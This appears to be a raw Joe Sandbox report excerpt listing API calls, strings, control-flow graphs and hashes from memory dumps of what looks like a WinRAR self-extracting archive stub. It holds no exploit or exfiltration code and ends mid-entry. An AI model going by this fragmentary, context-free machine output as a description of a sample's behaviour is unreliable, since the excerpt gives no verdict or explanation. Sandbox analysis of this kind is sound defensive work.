                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                        • Opcode ID: 5bb06e6c60b782bd375e2027480fb9416d4a45c20ad59fd4397fd90b0dd36811
                                                                                                                                        • Instruction ID: 9f215b7b93b1ee55f8c3753f61742bee7192d69d79c214644d82c3537a29f976
                                                                                                                                        • Opcode Fuzzy Hash: 5bb06e6c60b782bd375e2027480fb9416d4a45c20ad59fd4397fd90b0dd36811
                                                                                                                                        • Instruction Fuzzy Hash: EBE09231050508EBCF11AF64D90DB897B6AFB50341B058418F8099A522CB3ADD92CBC8
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 0079840E
                                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 00798870
                                                                                                                                          • Part of subcall function 007980F8: CharUpperW.USER32(?,?,00000000,?,?,?,?,?,?,?,00000800,?,007986E9,?,-00000930,?), ref: 007981BB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CharH_prologUpper_memcmp
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4047935103-0
                                                                                                                                        • Opcode ID: 9f8573c7af7b1f2f2b1019a33b1d1d834806954ab266fa7f9072a32ad7779451
                                                                                                                                        • Instruction ID: 07e8c388c4bdecc4db8ed4b4693e1e896be073de0670c4ec00395bfe2380d117
                                                                                                                                        • Opcode Fuzzy Hash: 9f8573c7af7b1f2f2b1019a33b1d1d834806954ab266fa7f9072a32ad7779451
                                                                                                                                        • Instruction Fuzzy Hash: C5722A70504185EEDF65DF64D885BF97BA9BF06300F0841FAE9499F243DB389A88C762
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                        • Opcode ID: 1143a4008c839d9076fb5bbee5c49d376748c22e65fba208b54fe09371535c74
                                                                                                                                        • Instruction ID: 5c46f950e1f63f3b8bf063776ea56a4f2c92574fc08df656bb425c263ffcb537
                                                                                                                                        • Opcode Fuzzy Hash: 1143a4008c839d9076fb5bbee5c49d376748c22e65fba208b54fe09371535c74
                                                                                                                                        • Instruction Fuzzy Hash: F0D126B1A047458FCB14CF28C88475BBBE1BFD6318F08476DE8449B642D738E959CBA6
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 007A9B54
                                                                                                                                          • Part of subcall function 007912E7: GetDlgItem.USER32(00000000,00003021), ref: 0079132B
                                                                                                                                          • Part of subcall function 007912E7: SetWindowTextW.USER32(00000000,007C02E4), ref: 00791341
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prologItemTextWindow
                                                                                                                                        • String ID: !}$"%s"%s$*A}$*a}$*x~$-el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                                                                        • API String ID: 810644672-615544423
                                                                                                                                        • Opcode ID: f09aeccdaa81a29abd0807e77b245b5f1221e7a2a07df0d343fc3f40c23d73e5
                                                                                                                                        • Instruction ID: 825102534469a2bded3c72e61ef0060fda5333640df3bc78da91560706a8ec95
                                                                                                                                        • Opcode Fuzzy Hash: f09aeccdaa81a29abd0807e77b245b5f1221e7a2a07df0d343fc3f40c23d73e5
                                                                                                                                        • Instruction Fuzzy Hash: EA424671941349FFEB21AF60DC8AFAE3BB8AB56700F008119F601A60D2D77D4D55CB6A

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 257 79f353-79f375 call 7acec0 GetModuleHandleW 260 79f3c8-79f62f 257->260 261 79f377-79f38e GetProcAddress 257->261 262 79f6fd-79f72e GetModuleFileNameW call 79b88c call 79f10e 260->262 263 79f635-79f640 call 7b462a 260->263 264 79f3a0-79f3aa GetProcAddress 261->264 265 79f390-79f39d 261->265 277 79f730-79f73a call 79a8e0 262->277 263->262 273 79f646-79f673 GetModuleFileNameW CreateFileW 263->273 264->260 266 79f3ac-79f3c3 264->266 265->264 266->260 275 79f6f1-79f6f8 CloseHandle 273->275 276 79f675-79f683 SetFilePointer 273->276 275->262 276->275 278 79f685-79f6a2 ReadFile 276->278 284 79f73c-79f740 call 79f309 277->284 285 79f747 277->285 278->275 280 79f6a4-79f6c9 278->280 282 79f6e6-79f6ef call 79ef07 280->282 282->275 291 79f6cb-79f6e5 call 79f309 282->291 292 79f745 284->292 288 79f749-79f74b 285->288 289 79f76d-79f78f call 79b902 GetFileAttributesW 288->289 290 79f74d-79f76b CompareStringW 288->290 293 79f791-79f795 289->293 299 79f799 289->299 290->289 290->293 291->282 292->288 293->277 297 79f797 293->297 300 79f79d-79f7a2 297->300 299->300 301 79f7a4 300->301 302 79f7d6-79f7d8 300->302 305 79f7a6-79f7c8 call 79b902 GetFileAttributesW 301->305 303 79f7de-79f7f5 call 79b8d6 call 79a8e0 302->303 304 79f8e5-79f8ef 302->304 315 79f85d-79f890 call 793f5b AllocConsole 303->315 316 79f7f7-79f858 call 79f309 * 2 call 79d142 call 793f5b call 79d142 call 7a8ccb 303->316 311 79f7ca-79f7ce 305->311 312 79f7d2 305->312 311->305 314 79f7d0 311->314 312->302 314->302 321 79f8dd-79f8df ExitProcess 315->321 322 79f892-79f8d7 GetCurrentProcessId AttachConsole call 7b20b3 GetStdHandle WriteConsoleW Sleep FreeConsole 315->322 316->321 322->321
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32 ref: 0079F36B
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0079F383
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0079F3A6
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0079F651
                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0079F669
                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0079F67B
                                                                                                                                        • ReadFile.KERNEL32(00000000,?,00007FFE,007C0858,00000000), ref: 0079F69A
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0079F6F2
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0079F708
                                                                                                                                        • CompareStringW.KERNEL32(00000400,00001001,007C08A4,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 0079F762
                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,007C0870,00000800,?,00000000,?,00000800), ref: 0079F78B
                                                                                                                                        • GetFileAttributesW.KERNEL32(?,?,0|,00000800), ref: 0079F7C4
                                                                                                                                          • Part of subcall function 0079F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0079F324
                                                                                                                                          • Part of subcall function 0079F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0079DEC8,Crypt32.dll,?,0079DF4A,?,0079DF2E,?,?,?,?), ref: 0079F346
                                                                                                                                        • _swprintf.LIBCMT ref: 0079F834
                                                                                                                                        • _swprintf.LIBCMT ref: 0079F880
                                                                                                                                          • Part of subcall function 00793F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00793F6E
                                                                                                                                        • AllocConsole.KERNEL32 ref: 0079F888
                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 0079F892
                                                                                                                                        • AttachConsole.KERNEL32(00000000), ref: 0079F899
                                                                                                                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 0079F8BF
                                                                                                                                        • WriteConsoleW.KERNEL32(00000000), ref: 0079F8C6
                                                                                                                                        • Sleep.KERNEL32(00002710), ref: 0079F8D1
                                                                                                                                        • FreeConsole.KERNEL32 ref: 0079F8D7
                                                                                                                                        • ExitProcess.KERNEL32 ref: 0079F8DF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                                                                                                                        • String ID: |$$|$,|$0|$@|$D|$D|$DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$\|$\|$`|$dwmapi.dll$kernel32$t|$uxtheme.dll$x|$x|$|$|
                                                                                                                                        • API String ID: 1201351596-908925887
                                                                                                                                        • Opcode ID: d096cfc180df053bc3ba6f9845e275cac94f731ad10283b6cbfa849fdbba47d7
                                                                                                                                        • Instruction ID: f7bdac9ca05c42f29c19eedc57e12f883f197e3d7ad7691cd9c3cd8a64ff5139
                                                                                                                                        • Opcode Fuzzy Hash: d096cfc180df053bc3ba6f9845e275cac94f731ad10283b6cbfa849fdbba47d7
                                                                                                                                        • Instruction Fuzzy Hash: B4D16FB1148384EADB30DFA0D849F9FBBE8AB84304F50492DF58996241D7BC9548CBE6

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 007AAA4A
                                                                                                                                          • Part of subcall function 007A96EC: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 007A97B4
                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000005,?,?,?,00000800,?,?,00000000,00000001,007AA35D,?,00000000), ref: 007AAB7F
                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 007AAC39
                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 007AAC47
                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 007AAD90
                                                                                                                                        • _wcsrchr.LIBVCRUNTIME ref: 007AAF1A
                                                                                                                                        • GetDlgItem.USER32(?,00000066), ref: 007AAF55
                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 007AAF65
                                                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,007D412A), ref: 007AAF79
                                                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007AAFA2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                                                                        • String ID: %s.%d.tmp$*A}$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                                        • API String ID: 3676479488-2127928686
                                                                                                                                        • Opcode ID: bd966fa016fc0bdc3d32afd5e3367e39687e1f35e809653ffc4e3d9ccf854eb1
                                                                                                                                        • Instruction ID: c327649e36fd89f63a61be8af9e26d6723802efc7ad8b692612cc58ab3055e85
                                                                                                                                        • Opcode Fuzzy Hash: bd966fa016fc0bdc3d32afd5e3367e39687e1f35e809653ffc4e3d9ccf854eb1
                                                                                                                                        • Instruction Fuzzy Hash: FBE16272901119EAEF24EBA0ED89EEE737CAF46350F1041A6F505E7041EF789B84CB61

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0079C88E: _wcschr.LIBVCRUNTIME ref: 0079C8BD
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0079CF0E
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0079CF1A
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0079CFBB
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0079CFE8
                                                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0079D007
                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 0079D02E
                                                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 0079D036
                                                                                                                                        • GetWindow.USER32(?,00000005), ref: 0079D041
                                                                                                                                        • GetWindowTextW.USER32(00000000,?,00000400), ref: 0079D06C
                                                                                                                                        • SetWindowTextW.USER32(00000000,00000000), ref: 0079D099
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0079D0AC
                                                                                                                                        • GetWindow.USER32(00000000,00000002), ref: 0079D11E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$RectText$ClientLongMetricsSystem_wcschr
                                                                                                                                        • String ID: d
                                                                                                                                        • API String ID: 4134264131-2564639436
                                                                                                                                        • Opcode ID: 343b5b3d068c10a1ac19633bac9ff7cb04fdf6639f20e5e0b14d02acaa2d50b1
                                                                                                                                        • Instruction ID: c1b8b7e6feecb1bbd7c4352d3eeaff142836c3460a3d8e55d13cc821687237c0
                                                                                                                                        • Opcode Fuzzy Hash: 343b5b3d068c10a1ac19633bac9ff7cb04fdf6639f20e5e0b14d02acaa2d50b1
                                                                                                                                        • Instruction Fuzzy Hash: E8617CB2208344AFD711DF68DD89E6BBBEAFBC9714F04491DF68492290C678ED058B52

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(00000068,007E8958), ref: 007AB71D
                                                                                                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,007A9325), ref: 007AB748
                                                                                                                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 007AB757
                                                                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,007C02E4), ref: 007AB761
                                                                                                                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 007AB777
                                                                                                                                        • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 007AB78D
                                                                                                                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 007AB7CD
                                                                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 007AB7D7
                                                                                                                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 007AB7E6
                                                                                                                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 007AB809
                                                                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,007C1368), ref: 007AB814
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$ItemShowWindow
                                                                                                                                        • String ID: \
                                                                                                                                        • API String ID: 1207805008-2967466578
                                                                                                                                        • Opcode ID: 58cf7ed76a42d2497ff49f20a56f3e8ca75121f9c02c11a526e0ea181d1ecad0
                                                                                                                                        • Instruction ID: 4d5e214a8d6519e8bc35db819d38cf5642690d6cf4ac1e03313805aaac1dfb45
                                                                                                                                        • Opcode Fuzzy Hash: 58cf7ed76a42d2497ff49f20a56f3e8ca75121f9c02c11a526e0ea181d1ecad0
                                                                                                                                        • Instruction Fuzzy Hash: 0D2134B12857447AE311AB248C41FAB7B9CEFC2714F00061DFA90961D1D7A949098AAB

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • ShellExecuteExW.SHELL32(000001C0), ref: 007ABAD8
                                                                                                                                        • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 007ABB1D
                                                                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 007ABB55
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 007ABB7B
                                                                                                                                        • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 007ABC0A
                                                                                                                                          • Part of subcall function 007A0B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0079AC49,?,?,?,0079ABF8,?,-00000002,?,00000000,?), ref: 007A0B28
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                                                                                                                        • String ID: $*Q}$.exe$.inf
                                                                                                                                        • API String ID: 3686203788-4020410685
                                                                                                                                        • Opcode ID: d17343024a21f5f899abd27cc907e1b590efdbaaa80d2563b2c3648ea8376043
                                                                                                                                        • Instruction ID: 2fb66c25396f33fa63c55375fac895ab6737df7ae53e1621876fd36fe0623634
                                                                                                                                        • Opcode Fuzzy Hash: d17343024a21f5f899abd27cc907e1b590efdbaaa80d2563b2c3648ea8376043
                                                                                                                                        • Instruction Fuzzy Hash: C35105B1506380DAD7319F20D984A7BB7E5AFC6304F048A1DE4C197157DB7D9944CBA2

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 0079CAD1
                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 0079CAEF
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0079CAB3,?), ref: 0079CB0A
                                                                                                                                          • Part of subcall function 007A06E9: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0079B25B,00000000,?,?,?,?), ref: 007A0705
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharFileH_prologModuleMultiNameWide_wcschr
                                                                                                                                        • String ID: *messages***$*messages***$R$a
                                                                                                                                        • API String ID: 803915177-2900423073
                                                                                                                                        • Opcode ID: ebe3da31c04b70ee80ae03944efa3a524df34085ecf62ef4b0910da24e61b61a
                                                                                                                                        • Instruction ID: 2ee4a8d17e223141e9634227c9e0d7c1dbf3cc543c8f9c6408a06ee6466e6296
                                                                                                                                        • Opcode Fuzzy Hash: ebe3da31c04b70ee80ae03944efa3a524df34085ecf62ef4b0910da24e61b61a
                                                                                                                                        • Instruction Fuzzy Hash: 979114B1A00205DBDF21DF68EC4ABEE7BA4EF55310F10456EE649E7291DA789A80CB50

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,007B2FC2,007B2FC2,?,?,?,007B75FF,00000001,00000001,F5E85006), ref: 007B7408
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,007B75FF,00000001,00000001,F5E85006,?,?,?), ref: 007B748E
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007B7588
                                                                                                                                        • __freea.LIBCMT ref: 007B7595
                                                                                                                                          • Part of subcall function 007B59FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,007B23AA,?,0000015D,?,?,?,?,007B2F29,000000FF,00000000,?,?), ref: 007B5A2E
                                                                                                                                        • __freea.LIBCMT ref: 007B759E
                                                                                                                                        • __freea.LIBCMT ref: 007B75C3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1414292761-0
                                                                                                                                        • Opcode ID: 6cac00eba924a1d7285ccd0f67a8b9bcadb0ce86a4cc92a4f8de42a4cd9c79a7
                                                                                                                                        • Instruction ID: fcc3349f99041e7108e1f03fe2b7f9ea5e63cc7f2162899662b02e4593727937
                                                                                                                                        • Opcode Fuzzy Hash: 6cac00eba924a1d7285ccd0f67a8b9bcadb0ce86a4cc92a4f8de42a4cd9c79a7
                                                                                                                                        • Instruction Fuzzy Hash: 6551BF7261421AABEB398E68CC85FFF77A9EF84750F154629FC05D6140EB38EC50D6A0

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0079F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0079F324
                                                                                                                                          • Part of subcall function 0079F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0079DEC8,Crypt32.dll,?,0079DF4A,?,0079DF2E,?,?,?,?), ref: 0079F346
                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 007A904F
                                                                                                                                        • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 007A9086
                                                                                                                                        • SHGetMalloc.SHELL32(007D20E8), ref: 007A9090
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
